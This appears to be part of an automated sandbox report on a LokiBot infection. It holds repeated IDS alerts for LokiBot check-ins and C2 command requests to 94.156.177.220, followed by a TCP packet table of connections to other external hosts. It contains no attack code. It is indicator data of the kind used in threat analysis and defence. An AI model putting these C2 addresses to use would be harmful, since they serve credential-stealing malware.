2024-10-24T21:23:40.186012+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-24T21:23:40.192064+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49179	TCP
2024-10-24T21:23:40.351612+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-24T21:23:40.351612+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-24T21:23:40.351612+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-24T21:23:41.449167+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-24T21:23:41.449167+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-24T21:23:41.455373+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49180	TCP
2024-10-24T21:23:41.637884+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-24T21:23:41.637884+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-24T21:23:41.637884+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-24T21:23:42.717883+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-24T21:23:42.717883+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-24T21:23:42.724663+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49181	TCP
2024-10-24T21:23:42.903713+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-24T21:23:42.903713+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-24T21:23:42.903713+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-24T21:23:43.958201+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-24T21:23:43.958201+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-24T21:23:43.964080+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49182	TCP
2024-10-24T21:23:44.172011+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-24T21:23:44.172011+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-24T21:23:44.172011+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-24T21:23:45.248595+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-24T21:23:45.248595+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-24T21:23:45.255136+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49183	TCP
2024-10-24T21:23:45.422327+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-24T21:23:45.422327+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-24T21:23:45.422327+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-24T21:23:46.621499+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-24T21:23:46.621499+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-24T21:23:46.858270+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49184	TCP
2024-10-24T21:23:46.883325+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-24T21:23:46.883325+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-24T21:23:46.883325+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-24T21:23:47.970542+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-24T21:23:47.970542+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-24T21:23:47.977146+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49185	TCP
2024-10-24T21:23:48.406792+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-24T21:23:48.406792+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-24T21:23:48.406792+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-24T21:23:49.409576+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-24T21:23:49.409576+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-24T21:23:49.415576+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49186	TCP
2024-10-24T21:23:49.566653+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-24T21:23:49.566653+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-24T21:23:49.566653+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-24T21:23:50.569418+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-24T21:23:50.569418+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-24T21:23:50.575297+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49187	TCP
2024-10-24T21:23:50.751878+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-24T21:23:50.751878+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-24T21:23:50.751878+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-24T21:23:51.776491+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-24T21:23:51.776491+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-24T21:23:51.783242+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49188	TCP
2024-10-24T21:23:51.961137+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-24T21:23:51.961137+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-24T21:23:51.961137+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-24T21:23:53.031405+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-24T21:23:53.031405+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-24T21:23:53.037216+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49189	TCP
2024-10-24T21:23:53.505309+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-24T21:23:53.505309+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-24T21:23:53.505309+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-24T21:23:55.553592+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-24T21:23:55.553592+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-24T21:23:55.559391+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49190	TCP
2024-10-24T21:23:55.726103+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-24T21:23:55.726103+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-24T21:23:55.726103+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-24T21:23:56.808265+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-24T21:23:56.808265+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-24T21:23:56.814340+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49191	TCP
2024-10-24T21:23:56.972372+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-24T21:23:56.972372+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-24T21:23:56.972372+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-24T21:23:59.107069+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-24T21:23:59.107069+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-24T21:23:59.107737+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49192	TCP
2024-10-24T21:23:59.275066+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-24T21:23:59.275066+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-24T21:23:59.275066+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-24T21:24:00.323075+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-24T21:24:00.323075+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-24T21:24:00.329944+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49193	TCP
2024-10-24T21:24:00.662976+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-24T21:24:00.662976+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-24T21:24:00.662976+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-24T21:24:01.787705+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-24T21:24:01.787705+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-24T21:24:01.793729+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49194	TCP
2024-10-24T21:24:01.927481+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-24T21:24:01.927481+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-24T21:24:01.927481+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-24T21:24:03.086401+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-24T21:24:03.086401+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-24T21:24:03.093210+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49195	TCP
2024-10-24T21:24:03.260935+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-24T21:24:03.260935+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-24T21:24:03.260935+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-24T21:24:04.455922+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-24T21:24:04.455922+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-24T21:24:04.456210+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49196	TCP
2024-10-24T21:24:04.916021+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-24T21:24:04.916021+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-24T21:24:04.916021+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-24T21:24:07.129727+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-24T21:24:07.129727+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-24T21:24:07.135690+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49197	TCP
2024-10-24T21:24:07.357975+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-24T21:24:07.357975+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-24T21:24:07.357975+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-24T21:24:08.466124+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-24T21:24:08.466124+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-24T21:24:08.472218+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49198	TCP
2024-10-24T21:24:08.611452+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-24T21:24:08.611452+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-24T21:24:08.611452+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-24T21:24:09.780520+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-24T21:24:09.780520+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-24T21:24:09.786399+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49199	TCP
2024-10-24T21:24:10.055685+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-24T21:24:10.055685+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-24T21:24:10.055685+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-24T21:24:14.272410+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-24T21:24:14.272410+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-24T21:24:14.278170+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49200	TCP
2024-10-24T21:24:14.427514+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-24T21:24:14.427514+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-24T21:24:14.427514+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-24T21:24:15.557829+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-24T21:24:15.557829+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-24T21:24:15.563775+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49201	TCP
2024-10-24T21:24:15.731889+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-24T21:24:15.731889+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-24T21:24:15.731889+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-24T21:24:16.929590+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-24T21:24:16.929590+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-24T21:24:16.936123+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49202	TCP
2024-10-24T21:24:17.099666+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-24T21:24:17.099666+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-24T21:24:17.099666+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-24T21:24:18.132065+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-24T21:24:18.132065+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-24T21:24:18.138996+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49203	TCP
2024-10-24T21:24:18.288921+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-24T21:24:18.288921+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-24T21:24:18.288921+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-24T21:24:19.432343+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-24T21:24:19.432343+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-24T21:24:19.438433+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49204	TCP
2024-10-24T21:24:19.585023+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-24T21:24:19.585023+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-24T21:24:19.585023+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-24T21:24:20.593841+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-24T21:24:20.593841+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-24T21:24:20.599686+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49205	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 21:22:35.353836060 CEST	49163	443	192.168.2.22	5.159.62.244
Oct 24, 2024 21:22:35.353926897 CEST	443	49163	5.159.62.244	192.168.2.22
Oct 24, 2024 21:22:35.354038000 CEST	49163	443	192.168.2.22	5.159.62.244
Oct 24, 2024 21:22:35.361545086 CEST	49163	443	192.168.2.22	5.159.62.244
Oct 24, 2024 21:22:35.361591101 CEST	443	49163	5.159.62.244	192.168.2.22
Oct 24, 2024 21:22:36.532737017 CEST	443	49163	5.159.62.244	192.168.2.22
Oct 24, 2024 21:22:36.532835960 CEST	49163	443	192.168.2.22	5.159.62.244
Oct 24, 2024 21:22:36.540530920 CEST	49163	443	192.168.2.22	5.159.62.244
Oct 24, 2024 21:22:36.540565968 CEST	443	49163	5.159.62.244	192.168.2.22
Oct 24, 2024 21:22:36.541047096 CEST	443	49163	5.159.62.244	192.168.2.22
Oct 24, 2024 21:22:36.541131020 CEST	49163	443	192.168.2.22	5.159.62.244
Oct 24, 2024 21:22:36.736035109 CEST	49163	443	192.168.2.22	5.159.62.244
Oct 24, 2024 21:22:36.783339024 CEST	443	49163	5.159.62.244	192.168.2.22
Oct 24, 2024 21:22:36.983913898 CEST	443	49163	5.159.62.244	192.168.2.22
Oct 24, 2024 21:22:36.984004974 CEST	443	49163	5.159.62.244	192.168.2.22
Oct 24, 2024 21:22:36.984002113 CEST	49163	443	192.168.2.22	5.159.62.244
Oct 24, 2024 21:22:36.984086990 CEST	49163	443	192.168.2.22	5.159.62.244
Oct 24, 2024 21:22:36.985625029 CEST	49163	443	192.168.2.22	5.159.62.244
Oct 24, 2024 21:22:36.985663891 CEST	443	49163	5.159.62.244	192.168.2.22
Oct 24, 2024 21:22:36.991358042 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:36.997112989 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:36.997275114 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:36.997385979 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.003087997 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.664978981 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.665040016 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.665079117 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.665113926 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.665150881 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.665184975 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.665220022 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.665252924 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.665252924 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.665252924 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.665254116 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.665254116 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.665254116 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.665307045 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.665344954 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.665360928 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.665360928 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.665385962 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.665411949 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.665481091 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.671220064 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.671272993 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.671336889 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.671441078 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.671441078 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.671441078 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.710957050 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.782351971 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.782402992 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.782442093 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.782504082 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.782533884 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.782553911 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.782555103 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.782555103 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.782555103 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.782568932 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.782604933 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.782632113 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.782632113 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.782639980 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.782671928 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.782680035 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.782696962 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.782754898 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.783492088 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.783545971 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.783565998 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.783607006 CEST	49164	80	192.168.2.22	192.3.176.141
